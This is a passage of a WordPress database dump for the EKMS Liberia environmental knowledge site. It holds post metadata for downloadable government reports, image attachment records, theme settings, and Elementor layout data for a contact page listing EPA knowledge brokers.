CRS'),(21362,3104,'year','2008'),(21363,3104,'download_link','https://ekmsliberia.info/wp-content/uploads/2020/07/2008-2009-CROP-ASSESSMENT-REPORT.pdf'),(21364,3104,'_pods_cover_image','a:1:{i:0;i:573;}'),(21365,3104,'_pods_file_type_image','a:1:{i:0;i:1686;}'),(21370,3104,'_dp_original','3097'),(21371,3104,'_edit_lock','1670325036:42'),(21372,3104,'_edit_last','42'),(21373,3105,'_wp_attached_file','2020/07/2008-2009-CROP-ASSESSMENT-REPORT.pdf'),(21375,3104,'_pods_attached_document','a:1:{i:0;i:3105;}'),(21381,3107,'_elementor_controls_usage','a:0:{}'),(21382,3107,'by','MOL, LISGIS'),(21383,3107,'year','2010'),(21384,3107,'download_link','https://ekmsliberia.info/wp-content/uploads/2020/07/2010-Labour-Force-Report.pdf'),(21385,3107,'_pods_cover_image','a:1:{i:0;i:573;}'),(21386,3107,'_pods_file_type_image','a:1:{i:0;i:1686;}'),(21391,3107,'_dp_original','3097'),(21392,3107,'_edit_lock','1670325037:42'),(21393,3107,'_edit_last','42'),(21394,3108,'_wp_attached_file','2020/07/2010-Labour-Force-Report.pdf'),(21396,3107,'_pods_attached_document','a:1:{i:0;i:3108;}'),(21402,3109,'_elementor_controls_usage','a:0:{}'),(21403,3109,'by','MOA'),(21404,3109,'year','2006'),(21405,3109,'download_link','https://ekmsliberia.info/wp-content/uploads/2020/07/2006-MOA-Annual-Report_1.pdf'),(21406,3109,'_pods_cover_image','a:1:{i:0;i:573;}'),(21412,3109,'_dp_original','3099'),(21413,3109,'_edit_lock','1670325035:42'),(21414,3109,'_edit_last','42'),(21415,3110,'_wp_attached_file','2020/07/2006-MOA-Annual-Report_1.pdf'),(21417,3109,'_pods_attached_document','a:1:{i:0;i:3110;}'),(21421,3111,'_wp_attached_file','2019/11/FFI-LOGO-e1594852798217.jpg'),(21422,3111,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:449;s:6:\"height\";i:175;s:4:\"file\";s:35:\"2019/11/FFI-LOGO-e1594852798217.jpg\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"FFI-LOGO-300x117.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:117;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"FFI-LOGO-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(21423,3111,'_wp_attachment_backup_sizes','a:1:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:449;s:6:\"height\";i:175;s:4:\"file\";s:12:\"FFI-LOGO.jpg\";}}'),(21424,3107,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1628469554;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3096;}i:1;a:1:{s:2:\"id\";i:3104;}i:2;a:1:{s:2:\"id\";i:3092;}}}}'),(21425,3109,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1629041815;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:1772;}i:1;a:1:{s:2:\"id\";i:3104;}i:2;a:1:{s:2:\"id\";i:1743;}}}}'),(21426,3102,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1628723312;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3107;}i:1;a:1:{s:2:\"id\";i:1724;}i:2;a:1:{s:2:\"id\";i:3104;}}}}'),(21427,3104,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1628778185;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:1772;}i:1;a:1:{s:2:\"id\";i:1766;}i:2;a:1:{s:2:\"id\";i:3109;}}}}'),(21458,3117,'_elementor_controls_usage','a:0:{}'),(21459,3117,'_thumbnail_id','3118'),(21460,3117,'ocean_gallery_link_images','off'),(21461,3117,'ocean_sidebar','0'),(21462,3117,'ocean_second_sidebar','0'),(21463,3117,'ocean_disable_margins','enable'),(21464,3117,'ocean_display_top_bar','default'),(21465,3117,'ocean_display_header','default'),(21466,3117,'ocean_center_header_left_menu','0'),(21467,3117,'ocean_custom_header_template','0'),(21468,3117,'ocean_header_custom_menu','0'),(21469,3117,'ocean_menu_typo_font_family','0'),(21470,3117,'ocean_disable_title','default'),(21471,3117,'ocean_disable_heading','default'),(21472,3117,'ocean_disable_breadcrumbs','default'),(21473,3117,'ocean_display_footer_widgets','default'),(21474,3117,'ocean_display_footer_bottom','default'),(21475,3117,'ocean_custom_footer_template','0'),(21476,3117,'ocean_link_format_target','self'),(21477,3117,'ocean_quote_format_link','post'),(21478,3117,'osh_disable_topbar_sticky','default'),(21479,3117,'osh_disable_header_sticky','default'),(21480,3117,'osh_sticky_header_style','default'),(21481,3117,'_dp_original','3069'),(21482,3117,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1628641777;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3127;}i:1;a:1:{s:2:\"id\";i:2801;}i:2;a:1:{s:2:\"id\";i:3297;}}}}'),(21483,3117,'_edit_lock','1598381685:42'),(21484,3118,'_wp_attached_file','2020/08/ekms.jpg'),(21485,3118,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1732;s:6:\"height\";i:1045;s:4:\"file\";s:16:\"2020/08/ekms.jpg\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"ekms-300x181.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:181;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:17:\"ekms-1024x618.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:618;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"ekms-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:16:\"ekms-768x463.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:463;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:17:\"ekms-1536x927.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:927;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(21488,3117,'_edit_last','42'),(21520,3124,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1628641639;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3117;}i:1;a:1:{s:2:\"id\";i:3297;}i:2;a:1:{s:2:\"id\";i:2801;}}}}'),(21521,3124,'_edit_lock','1598366577:42'),(21522,3125,'_wp_attached_file','2020/08/117999801_638497756792008_4036954288064851198_o.jpg'),(21523,3125,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1687;s:6:\"height\";i:758;s:4:\"file\";s:59:\"2020/08/117999801_638497756792008_4036954288064851198_o.jpg\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:4:{s:4:\"file\";s:59:\"117999801_638497756792008_4036954288064851198_o-300x135.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:135;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:60:\"117999801_638497756792008_4036954288064851198_o-1024x460.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:460;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"117999801_638497756792008_4036954288064851198_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:59:\"117999801_638497756792008_4036954288064851198_o-768x345.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:345;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:60:\"117999801_638497756792008_4036954288064851198_o-1536x690.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:690;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(21524,3124,'_edit_last','42'),(21526,3124,'ocean_gallery_link_images','off'),(21527,3124,'ocean_sidebar','0'),(21528,3124,'ocean_second_sidebar','0'),(21529,3124,'ocean_disable_margins','enable'),(21530,3124,'ocean_display_top_bar','default'),(21531,3124,'ocean_display_header','default'),(21532,3124,'ocean_center_header_left_menu','0'),(21533,3124,'ocean_custom_header_template','0'),(21534,3124,'ocean_header_custom_menu','0'),(21535,3124,'ocean_menu_typo_font_family','0'),(21536,3124,'ocean_disable_title','default'),(21537,3124,'ocean_disable_heading','default'),(21538,3124,'ocean_disable_breadcrumbs','default'),(21539,3124,'ocean_display_footer_widgets','default'),(21540,3124,'ocean_display_footer_bottom','default'),(21541,3124,'ocean_custom_footer_template','0'),(21542,3124,'ocean_link_format_target','self'),(21543,3124,'ocean_quote_format_link','post'),(21544,3124,'osh_disable_topbar_sticky','default'),(21545,3124,'osh_disable_header_sticky','default'),(21546,3124,'osh_sticky_header_style','default'),(21547,3124,'_thumbnail_id','3125'),(21548,3124,'_elementor_controls_usage','a:0:{}'),(21551,3127,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1628641920;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:2801;}i:1;a:1:{s:2:\"id\";i:3117;}i:2;a:1:{s:2:\"id\";i:3749;}}}}'),(21552,3127,'_edit_lock','1598367620:42'),(21556,3127,'_edit_last','42'),(21557,3127,'ocean_gallery_link_images','off'),(21558,3127,'ocean_sidebar','0'),(21559,3127,'ocean_second_sidebar','0'),(21560,3127,'ocean_disable_margins','enable'),(21561,3127,'ocean_display_top_bar','default'),(21562,3127,'ocean_display_header','default'),(21563,3127,'ocean_center_header_left_menu','0'),(21564,3127,'ocean_custom_header_template','0'),(21565,3127,'ocean_header_custom_menu','0'),(21566,3127,'ocean_menu_typo_font_family','0'),(21567,3127,'ocean_disable_title','default'),(21568,3127,'ocean_disable_heading','default'),(21569,3127,'ocean_disable_breadcrumbs','default'),(21570,3127,'ocean_display_footer_widgets','default'),(21571,3127,'ocean_display_footer_bottom','default'),(21572,3127,'ocean_custom_footer_template','0'),(21573,3127,'ocean_link_format_target','self'),(21574,3127,'ocean_quote_format_link','post'),(21575,3127,'osh_disable_topbar_sticky','default'),(21576,3127,'osh_disable_header_sticky','default'),(21577,3127,'osh_sticky_header_style','default'),(21578,3130,'_wp_attached_file','2020/08/118265702_641907606451023_8403732740422242380_o.jpg'),(21579,3130,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1956;s:6:\"height\";i:1170;s:4:\"file\";s:59:\"2020/08/118265702_641907606451023_8403732740422242380_o.jpg\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:4:{s:4:\"file\";s:59:\"118265702_641907606451023_8403732740422242380_o-300x179.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:179;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:60:\"118265702_641907606451023_8403732740422242380_o-1024x613.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:613;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"118265702_641907606451023_8403732740422242380_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:59:\"118265702_641907606451023_8403732740422242380_o-768x459.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:459;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:60:\"118265702_641907606451023_8403732740422242380_o-1536x919.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:919;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(21580,3127,'_thumbnail_id','3130'),(21581,3127,'_elementor_controls_usage','a:0:{}'),(21661,3141,'_wp_attached_file','2020/09/Baseline-Study-Report-FINAL-12.11.13.pdf'),(21668,3143,'_wp_attached_file','2020/09/Guidelines-for-Water-and-Sanitation-Services-in-Liberia.pdf'),(21694,3145,'_wp_attached_file','2020/09/Guidelines-for-Water-and-Sanitation-Services-in-Liberia-1.pdf'),(21714,3147,'_wp_attached_file','2020/09/JSR-III-Event-Report.pdf'),(21733,3149,'_wp_attached_file','2020/09/Liberia-WASH-Cluster-Newsletter-Issue-1-Nov-2014.pdf'),(21737,3150,'_wp_attached_file','2020/09/Liberia-WASH-Cluster-Newsletter-Issue-1-Nov-2014-1.pdf'),(21771,3152,'_wp_attached_file','2020/09/National-Policy-and-Response-Strategy-on-Climate-Change-Final-Document-min_0.pdf'),(21783,3154,'_elementor_edit_mode','builder'),(21784,3154,'_elementor_template_type','wp-page'),(21785,3154,'_elementor_version','2.7.5'),(21786,3154,'_wp_page_template','default'),(21787,3154,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"slideshow\",\"background_color\":\"rgba(255,255,255,0.75)\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_slideshow_gallery\":[{\"id\":2315,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\"}],\"background_slideshow_loop\":\"\"},\"elements\":[],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":90,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"J.S. Datuama Cammue\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"caption\":\"Benjamin Karmorh\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BJ-1.jpg\",\"id\":2357},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"Berexford S. Jallah\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"John K. 